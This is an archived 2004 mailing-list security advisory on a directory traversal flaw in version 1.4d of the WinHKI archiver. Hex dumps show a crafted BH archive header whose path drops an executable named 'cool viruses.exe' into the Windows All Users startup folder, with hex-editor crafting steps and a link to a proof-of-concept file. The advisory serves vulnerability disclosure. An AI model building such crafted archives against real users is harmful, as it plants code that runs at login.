| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider) Subject: WinHKI - BH File Directory Transversal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: WinHKI Vendors: http://www.webtoolmaster.com Versions: 1.4d Platforms: Windows Bug: BH File Directory Transversal Exploitation: Local (extract file) Date: 24 Dec 2004 Author: Rafel Ivgi, The-Insider E-Mail: the_insider@...l.com Website: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ compressions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== This is a normal BH compressed file header 00000000 484B 4901 1441 0000 FD00 3973 7831 8D34 HKI..A....9sx1.4 00000010 3741 7800 0000 1B00 0000 0500 0000 302E 7Ax...........0. 00000020 6874 6D00 0010 0078 0000 001B 0000 008D htm....x........ 00000030 3437 4101 0000 0001 06FF FF00 0000 0000 47A............. in the following code, we can see how easy it is to change the path to anywhere we want, including the all users start up folder. 00000000 484B 4901 1441 0000 FD00 6C8C 9031 066A HKI..A....l..1.j 00000010 8E05 F600 0000 D300 0000 4000 0000 633A ..........@...c: 00000020 5C64 6F63 756D 657E 315C 616C 6C75 7365 \docume~1\alluse 00000030 7E31 5C73 7461 7274 6D7E 315C 7072 6F67 ~1\startm~1\prog 00000040 7261 6D73 5C73 7461 7274 7570 5C63 6F6F rams\startup\coo 00000050 6C20 2076 6972 7573 6573 2E65 7865 0000 l viruses.exe.. 00000060 1000 F600 0000 D300 0000 066A 8E05 0100 ...........j.... All we need to do is cab compress (using WinHKI) a file with a long name/path and change the path specified inside the file to whatever we want Using any Hex editor such as HexWorkshop, just add anything to the filename. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== An online proof of concept can be found at: http://theinsider.deep-ice.com/poc.bh ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Scripts and Codes will make me D.O.S , but they will never HACK me."
Powered by blists - more mailing lists